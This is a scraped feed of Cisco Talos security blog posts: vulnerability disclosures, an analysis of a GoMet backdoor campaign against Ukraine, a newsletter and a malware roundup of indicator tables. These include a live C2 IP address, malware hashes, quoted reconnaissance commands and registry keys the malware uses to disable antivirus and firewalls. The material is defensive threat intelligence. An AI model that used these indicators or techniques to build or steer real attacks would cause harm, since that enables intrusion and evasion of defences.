There are new articles available, click to refresh the page.
Before yesterdayCisco Talos

Vulnerability Spotlight: Vulnerabilities in Alyac antivirus program could stop virus scanning, cause code execution

3 August 2022 at 18:46


Jaewon Min of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Update (Aug. 3, 2022): Talos disclosed two new vulnerabilities in the Alyac antivirus software and added their details to this post.

Cisco Talos recently discovered out-of-bounds read and buffer overflow vulnerabilities in ESTsecurity Corp.’s Alyac antivirus software that could cause a denial-of-service condition or arbitrary code execution. Alyac is an antivirus software developed for Microsoft Windows machines. 

TALOS-2022-1452 (CVE-2022-21147) is a vulnerability that exists in a specific Alyac module that, eventually, leads to a crash of Alyac’s scanning process, which effectively neutralizes the antivirus scan. If successful, an attacker could trigger this vulnerability to stop the program from scanning for malware, which would be crucial in a potential attack scenario. 

TALOS-2022-1527 (CVE-2022-32543) and TALOS-2022-1533 (CVE-2022-29886) are heap-based buffer overflow vulnerabilities that an attacker could exploit to execute arbitrary code on the targeted machine. The adversary would have to convince a user to open a specially crafted OLE file to trigger this condition.

Cisco Talos worked with ESTsecurity to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy

Users are encouraged to update these affected products as soon as possible: ESTsoft Alyac, versions 2.5.7.7 and 2.5.8.544. Talos tested and confirmed ESTsoft Alyac, version 2.5.7.7, is affected by TALOS-2022-1452. Version 2.5.8.544 is vulnerable to TALOS-2022-1533 and TALOS-2022-1527.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 59014, 59015, and 60035 - 60042. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

EMEAR Monthly Talos Update: Training the next generation of cybersecurity researchers

15 July 2022 at 14:37

Cisco Talos and Cisco Secure have the latest edition of the Talos EMEAR Threat Update series out now, which you can watch above or over at this link, where Martin Lee and Hazel Burton talk about the cybersecurity skills gap that currently exists and how we can better train the next generation of defenders. Martin provides some insight into why diversity in security hiring is important, whether it be based on background, experience, age, race or anything else. 

Vulnerability Spotlight: Issue in Accusoft ImageGear could lead to memory corruption, code execution

19 July 2022 at 12:45



Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered a use-after-free vulnerability in Accusoft ImageGear's PSD header processing function. 

The ImageGear library is a document-imaging developer toolkit that allows users to create, edit, annotate and convert various images. It supports more than 100 file formats such as DICOM, PDF and Microsoft Office. 

This vulnerability, TALOS-2022-1526 (CVE-2022-29465) could allow an attacker to cause a use-after-free condition by tricking the targeted user into opening a malformed .psd file in the application. The vulnerability leads to out-of-bounds heap writes, which causes memory corruption and, possibly, code execution.

In adherence to Cisco’s vulnerability disclosure policy, Accusoft patched this issue and released an update for ImageGear.

Talos tested and confirmed Accusoft ImageGear, version 19.10, is affected by this vulnerability. 

The following Snort rules will detect exploitation attempts against this vulnerability: 60228 and 60229. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

Attackers target Ukraine using GoMet backdoor

21 July 2022 at 12:00



Executive summary


Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage of cyber attacks. Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine — this time aimed at a large software development company whose software is used in various state organizations within Ukraine. We believe that this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named "GoMet." The malware was first observed on March 28, 2022.


GoMet backdoor


The story of this backdoor is rather curious — there are two documented cases of its usage by sophisticated threat actors. First, in 2020, attackers were deploying this malware after the successful exploitation of CVE-2020-5902, a vulnerability in F5 BIG-IP so severe that USCYBERCOM posted a tweet urging all users to patch the application. The second is more recent and involved the successful exploitation of CVE-2022-1040, a remote code execution vulnerability in Sophos Firewall.

Both cases are very similar. They both start with the exploitation of a public vulnerability on appliances where the malicious actors then dropped GoMet as a backdoor. As of publishing time, Cisco Talos has no reason to believe these cases are related to the usage of this backdoor in Ukraine.

The original GoMet author posted the code on GitHub on March 31, 2019 and had commits until April 2, 2019. The commits didn't add any features but did fix some code convention aesthetics. The backdoor itself is a rather simple piece of software written in the Go programming language. It contains nearly all the usual functions an attacker might want in a remotely controlled agent. Agents can be deployed on a variety of operating systems (OS) or architectures (amd64, arm, etc.). GoMet supports job scheduling (via Cron or task scheduler depending on the OS), single command execution, file download, file upload or opening a shell. An additional notable feature of GoMet lies in its ability to daisy chain — whereby the attackers gain access to a network or machine and then use that same information to gain access to multiple networks and computers — connections from one implanted host to another. Such a feature could allow for communication out to the internet from otherwise completely "isolated" hosts.

This version was changed by malicious actors, in the original code, the cronjob is configured to be executed once every hour on the hour. In our samples, the cronjob is configured to run every two seconds. This change makes the sample slightly more noisy since it executes every two seconds, but also prevents an hour-long sleep if the connection fails which would allow for more aggressive reconnection to the C2.

The objective of the cron job defined in the main part of the malware is to check if it's connected to the C2, if not it will start the agent component again and connect to the C2. The picture below shows the execution flow of the C2 setup routine Agent.Start.


This flow reveals another change to the GitHub versions. If the C2 is unreachable, the sample will sleep for a random amount of time between five and 10 minutes. GO's sleep implementation uses nanoseconds. The Pseudo Code would look like the following: time_Sleep(1000000000 * (rnd_val + 300)).

The 'WaitGroup_Add' call in the disassembly screenshot can also be confusing. The trick is, the Go compiler is changing the source code WaitGroup.Done() to WaitGroup.Add(-1).

After the Agent.start routine is done, the next cron job triggered the execution of the serve() routine and tried to start another instance of the Agent.

The simplified source code of the GitHub version looks like this:



The simplified pseudo-code for the samples in the wild looks like this:



Talos found two samples of this version of the backdoor:

f24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb (FctSec.exe)

950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 (SQLocalM86.exe)

These samples have minor differences but are likely built from the same source code, just with a slightly different configuration.

If we look closely at the functions, they are not 100% equal, but we can see that the changes are mainly strings and similar victim or compiler-dependent data, along with researcher comments. Below is the Main.Main function as an example.



The malicious activity we detected included a fake Windows update scheduled tasks created by the GoMet dropper. Additionally, the malware used a somewhat novel approach to persistence. It enumerated the autorun values and, instead of creating a new one, replaced one of the existing goodware autorun executables with the malware. This potentially could avoid detection or hinder forensic analysis.

In one of the cases, about 60 seconds before the schtask query is executed, a blank CMD process is opened and then subsequently executes systeminfo and schtask queries rather than these queries being chain opened by svchost or services or another process. This execution looks like:

C:\WINDOWS\system32\cmd.exe 7)

systeminfo

schtasks /query /tn microsoft\windows\windowsupdate\scheduled

schtasks /query /tn microsoft\windows\windowsupdate\scheduled /v



Infrastructure


Both samples have the command and control (C2) IP address hardcoded, which is 111.90.139[.]122. Communication occurs via HTTPS on the default port.

The certificate on this server was issued on April 4, 2021 as a self-signed certificate, with the 9b5e112e683a3605c9481d8f565cfb3b7e2feab7 SHA-1 fingerprint. This indicates that this campaign preparation began as early as April 2021. At the moment, there are no known domains associated with this IP address and the last time there was a domain associated with it was on Jan. 23, 2021, which is outside the known attack time frame.


Conclusion


As the war in Ukraine rages on with little resolution in sight, we are reminded that attackers will try just about anything to gain additional leverage over their Ukrainian adversaries. Cisco Talos expects to see the continued deployment of a range of cyber weapons targeting the Ukrainian government and its counterparts. We remain vigilant and are committed to helping Ukraine defend its networks against such cyber attacks and working closely with our strategic allies in the region to gather and provide actionable threat intelligence.

In this instance, we saw a software company targeted with a backdoor designed for additional persistent access. We also observed the threat actor take active steps to prevent detection of their tooling by obfuscating samples and utilizing novel persistence techniques. This access could be leveraged in a variety of ways, including deeper access or launching additional attacks, including the potential for software supply chain compromise. It's a reminder that although the cyber activities haven't necessarily risen to the level many have expected, Ukraine is still facing a well-funded, determined adversary that can inflict damage in a variety of ways — this is just the latest example of those attempts.

We assess with moderate to high confidence that these actions are being conducted by Russian state-sponsored actors or those acting in their interests.


Coverage


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


Indicators of Compromise

SHA-256 Hashes

f24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb
950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88


IPs

111.90.139[.]122



Threat Source newsletter (July 21, 2022) — No topic is safe from being targeted by fake news and disinformation

21 July 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

I could spend time in this newsletter every week talking about fake news. There are always so many ridiculous memes, headlines, misleading stories, viral Facebook posts and manipulated media that I see come across my Instagram feed or via my wife when she shows me TikToks she favorited. 

One recent event, though, was so crushing to me that I had to call it out specifically. Former Japanese Prime Minister Shinzo Abe was assassinated earlier this month while making a campaign speech in public. This was a horrible tragedy marking the death of a powerful politician in one of the world’s most influential countries. It was the top story in the world for several days and was even more shocking given Japan’s strict gun laws and the relative infrequency of any global leaders being the target of violence. 

It took no time for the internet at large to take this tragedy and immediately try to spin it to their whims to spread false narratives, disinformation and downright harmful fake stories that mar Abe’s death and make a mockery of the 24/7 news cycle and the need for everyone to immediately have their own “take” on social media. 

Shortly after Abe’s murder, a far-right French politician took a false claim from the infamous online forum 4chan that video game developer Hideo Kojima was the suspect who killed Abe and shared it on Twitter. The politician, Damien Rieu, even went as far to connect Kojima to the “far left,” linking to pictures of the “Metal Gear Solid” creator wearing a shirt depicting the Joker and a bag with Che Guevara’s face on it. Rieu’s tweet was taken as fact by a Greek television news station, which also aired a report that Kojima was the assassin.  

Thankfully, this claim was quickly debunked and the politician issued an apology, but Kojima and his company have threatened legal action over the ordeal (as they should). This is an appalling scenario in which social media was quick to assign blame for Abe’s assassination, then picked up by an influential person and even making it to a reputable international news station. This goes beyond the realm of the typical “Russian bot” fake news we think of this was a failure to run any simple fact checks before reporting a damning claim about someone. Imagine if it was just anyone who was blamed for Abe’s assassination, and not someone like Kojima who has a very public platform and the funds to fight these claims.  

People also took the opportunity within the first few hours of Abe’s death to try and craft their own narrative using fake news and misleading information. A viral claim that he was killed over his COVID-19-related policies made the rounds, though these claims were later proven verifiably false. Another completely fake and manipulated screenshot claimed to show that Abe had tweeted shortly before his death that he had incriminating news about U.S. politician Hillary Clinton.  

I went on Instagram and found a still-active post from an account with more than 54,000 followers that indicates that Abe was assassinated because he had less-than-strict COVID policies that did not align with the “global agenda.” Instagram flagged the post as “missing context,” but does not flag it as downright false and the content is still accessible as of Wednesday afternoon.  

What disturbs me the most about this whole event is that nothing is off limits for social media users to bend to their whim. I suppose I can't say I’m surprised — ESPN even recently fell for something as silly as a fake TikTok video alleging to show a UPS driver dunking a basketball while jumping over a car. But it is a stark reminder that when breaking news occurs, no matter how serious or dangerous it is, there’s always going to be people online who will be spreading fake news, disinformation and/or misinformation. This makes me miss the days when the biggest fake news story out there was Balloon Boy.  

  

The one big thing 


The U.S. Cybersecurity and Infrastructure Security Agency is asking all federal agencies to patch for an actively exploited Microsoft vulnerability disclosed last week. By adding CVE-2022-22047, an elevation of privilege vulnerability affecting the Windows Client Server Runtime Subsystem (CSRSS), to its list of known exploited vulnerabilities, agencies are compelled to patch for the issue by Aug. 2. Microsoft and CISA both say attackers are actively exploiting the issue in the wild.  

Why do I care? 

This vulnerability is the only one disclosed as part of last week’s Patch Tuesday that’s been exploited in the wild.  An attacker could exploit this vulnerability to execute code on the targeted machine as SYSTEM. However, they would need physical access to a machine to exploit the issue. That being said, if CISA is warning users that it’s being actively exploited in the wild, it’s good of a time as any to remember to patch.  

So now what? 

Our Patch Tuesday blog post contains links to Microsoft’s updates for Patch Tuesday and a rundown of other vulnerabilities you should know about. Additionally, we have multiple Snort rules that can detect attempts to exploit CVE-2022-22047.  

 

Other news of note


The U.S. Department of Homeland Security declared the Log4shell vulnerability is “endemic” and will present a risk to organizations for at least the next decade. A new report into the major vulnerability in Log4j declared that the open-source community does not have enough resources to properly secure its code and needs the public and private sector to assist with the implementation of patches. They also warned that there are still many instances of vulnerable software that attackers could take advantage of. The DHS report also says the original vulnerable code could have been detected in 2013 had the reviewers had the time had the appropriate cybersecurity knowledge to spot the flaw. That being said, the investigating panel said there were no major cyber attacks against U.S. critical infrastructure leveraging Log4shell. (Dark Reading, Associated Press, ZDNet

The European Union is warning that increased cyber attacks from Russian state-sponsored actors run the risk of unnecessary escalation and spillover effects to all of Europe. A formal EU declaration says that member nations “strongly condemn this unacceptable behaviour in cyberspace and express solidarity with all countries that have fallen victim.” A Lithuanian energy firm was the recent target of a distributed denial-of-service attack that the country said was the largest cyber attack in a decade. Belgian leaders also say their country was recently targeted by several Chinese state-sponsored groups. (Bleeping Computer, Council of the European Union, Infosecurity Magazine

A relatively small botnet is suspected to be behind more than 3,000 recent distributed denial-of-service attacks. The Mantis botnet, which is suspected to be an evolution of Meris, has already targeted users in Germany, Taiwan, South Korea, Japan, the U.S. and the U.K. Most recently, it launched a malware campaign against Android users in France, using malicious SMS messages to lure victims into downloading malware that adds devices to the botnet’s growing system. Security researchers say users have already downloaded the malware about 90,000 times. (Bleeping Computer, ZDNet


Can’t get enough Talos? 


Upcoming events where you can find Talos 


A New HOPE (July 22 - 24, 2022)
New York City 

CTIR On Air (July 28, 2022)
Talos Twitter, LinkedIn and YouTube pages

BlackHat U.S. (Aug. 6 - 11, 2022)
Las Vegas, Nevada 

DEF CON U.S. (Aug. 11 - 14, 2022)
Las Vegas, Nevada 


Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 5741eadfc89a1352c61f1ff0a5c01c06  
Typical Filename: 3.exe  
Claimed Product: N/A
Detection Name: W32.DFC.MalParent  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

Threat Roundup for July 15 to July 22

22 July 2022 at 21:51

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 15 and July 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Virus.Ramnit-9957454-0 Virus Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It could also steal browser cookies and hides from popular antivirus software.
Win.Malware.Kovter-9957371-0 Malware Kovter is known for it's fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Ransomware.TeslaCrypt-9957356-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the extortion request, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Dropper.Shiz-9957241-0 Dropper Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by victims visiting a malicious site.
Win.Dropper.Zeus-9957126-0 Dropper Zeus is a trojan that steals information such as banking credentials using methods such as key-logging and form-grabbing.
Win.Dropper.Tofsee-9957067-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the botnet and send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Packed.Nanocore-9957022-0 Packed Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Dropper.LokiBot-9957019-0 Dropper Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature and can steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.

Threat Breakdown

Win.Virus.Ramnit-9957454-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
16
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
16
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
16
Mutexes Occurrences
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 16
{79345B6A-421F-2958-EA08-07396ADB9E27} 16
{7930D12D-1D38-EB63-89CF-4C8161B79ED4} 16
{7930CC18-1D38-EB63-89CF-4C8161B79ED4} 16
{7930DB19-1D38-EB63-89CF-4C8161B79ED4} 16
{<random GUID>} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
195[.]201[.]179[.]207 16
142[.]251[.]40[.]142 16
46[.]165[.]220[.]145 15
72[.]26[.]218[.]70 15
208[.]100[.]26[.]245 14
35[.]205[.]61[.]67 14
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
google[.]com 16
bungetragecomedy9238[.]com 16
kbivgyaakcntdet[.]com 16
oawvuycoy[.]com 16
fmsqakcxgr[.]com 15
jlaabpmergjoflssyg[.]com 15
kbodfwsbgfmoneuoj[.]com 15
oeuwldhkrnvxg[.]com 15
wstujheiancyv[.]com 15
yrkbpnnlxrxrbpett[.]com 15
ausprcogpngdpkaf[.]com 14
citnngljfbhbqtlqlrn[.]com 14
dvwtcefqgfnixlrdb[.]com 14
qislvfqqp[.]com 14
ypwosgnjytynbqin[.]com 14
wdgqvaya[.]com 14
gfaronvw[.]com 14
Files and or directories created Occurrences
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 16
%LOCALAPPDATA%\bolpidti 16
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 16
%TEMP%\squhapjc.exe 16
%TEMP%\aacwxnxw.exe 16
%ProgramData%\qvqdlyny.log 16
%LOCALAPPDATA%\yjghhxdl.log 16
%LOCALAPPDATA%\aanqrsjf.log 16
\TEMP\naEnI23 6
\TEMP\YsbJf23 3
\TEMP\tbii193 3
\TEMP\sXw0IB2 1
\TEMP\DrPmx23 1
%LOCALAPPDATA%\bolpidti\pxAA0.tmp 1
\TEMP\48at1iwB 1
\TEMP\bvr7hgqN 1

File Hashes

040aba270ceca1eb00733e6733d2aa1da65f7a2c1f7aeff8f17c5d1070752535 0f95459d96bc1dd999753862126023c5a868d6b4350b6e72b6ca7aa683c3ade1 126aeea38387066d0cb15d2bf6476e7324abf67168defbc9e18352e68ef1174d 1d2f933a0c2c448e55f4106dae274696717ace70131035a4df42b6c5a373bb3e 283d8a891f3e3f478a74a3e5eacb12e4bcc803be1219c9c38cfdfb5890e2279e 2fbbaed010dc46bb6dac16bab57ee04e96965bea8142d37f7b3cb88a1e476e4f 587d34dd12dde3d009c85ba20416f1b354a4ae643777d28bb52ad8f9168cd4b0 5d490643405c093eab1f1a5b864943b0507400f0f3141de7f089c6ccc12fd316 7cacb6c76f80a1f500eacb7e9145fb7da0726343b54c547a4dc560d2f37fb18f 8f8d34773a5bfa95aea47bac3fb05fb11786312b6ef2a9223012b0bd88e167f9 99dafa7b30b55ca6c088739a27f3704862ba99fe051884478c5337ab5d507679 b297360c21d003261c25e314a2f16905086202ddc203765adc263ca5b6436ae0 b5f278f958e930c42e168e091ca7ff369aeab730d6626e6661bd51224ed93506 ba7ca9f0aa3d6ce0c63a81411e97deda8d952d06e9307f0058e0b3d08de72b87 c176340ea7e16d209b904405281425983679182aa7765e7a67646c87aa81c661 f7a787118f46b489f2a45ca7228322bebba7eb10aa00183cbde74773aa3753da

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Malware.Kovter-9957371-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG
Value Name: xedvpa
25
<HKCU>\SOFTWARE\XVYG
Value Name: xedvpa
25
<HKCR>\.8CA9D79 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vrxzdhbyv
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ssishoff
25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG
Value Name: tbqjcmuct
25
<HKCU>\SOFTWARE\XVYG
Value Name: tbqjcmuct
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 25
<HKCU>\SOFTWARE\XVYG 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG 25
<HKCR>\C3B616 25
<HKCR>\C3B616\SHELL 25
<HKCR>\C3B616\SHELL\OPEN 25
<HKCR>\C3B616\SHELL\OPEN\COMMAND 25
<HKCR>\.8CA9D79 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG
Value Name: svdjlvs
25
<HKCU>\SOFTWARE\XVYG
Value Name: svdjlvs
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fcbburq
25
Mutexes Occurrences
EA4EC370D1E573DA 25
A83BAA13F950654C 25
Global\7A7146875A8CDE1E 25
B3E8F6F86CDD9D8B 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
95[.]124[.]204[.]21 1
4[.]241[.]178[.]108 1
13[.]128[.]69[.]186 1
109[.]227[.]104[.]183 1
221[.]105[.]207[.]89 1
137[.]201[.]198[.]88 1
39[.]19[.]244[.]52 1
155[.]145[.]195[.]61 1
33[.]32[.]249[.]162 1
83[.]31[.]52[.]148 1
129[.]233[.]227[.]218 1
62[.]40[.]76[.]178 1
69[.]247[.]75[.]163 1
119[.]31[.]244[.]99 1
18[.]90[.]144[.]73 1
199[.]77[.]183[.]213 1
130[.]86[.]117[.]171 1
68[.]21[.]73[.]93 1
39[.]232[.]85[.]81 1
66[.]33[.]222[.]234 1
222[.]207[.]122[.]202 1
110[.]56[.]135[.]234 1
6[.]22[.]73[.]16 1
50[.]159[.]160[.]25 1
217[.]52[.]47[.]12 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
apps[.]identrust[.]com 1
reflex-demo-use-4[.]hannover-re[.]cloud 1
flyttstadning-stockholm[.]nu 1
Files and or directories created Occurrences
%LOCALAPPDATA%\4dd3cc 25
%LOCALAPPDATA%\4dd3cc\519d0f.bat 25
%LOCALAPPDATA%\4dd3cc\8e9866.8ca9d79 25
%LOCALAPPDATA%\4dd3cc\d95adb.lnk 25
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91b4e5.lnk 25
%APPDATA%\b08d66 25
%APPDATA%\b08d66\0b3c0b.8ca9d79 25
%TEMP%\VB<random, matching [A-F0-9]{3,4}>.tmp 25

File Hashes

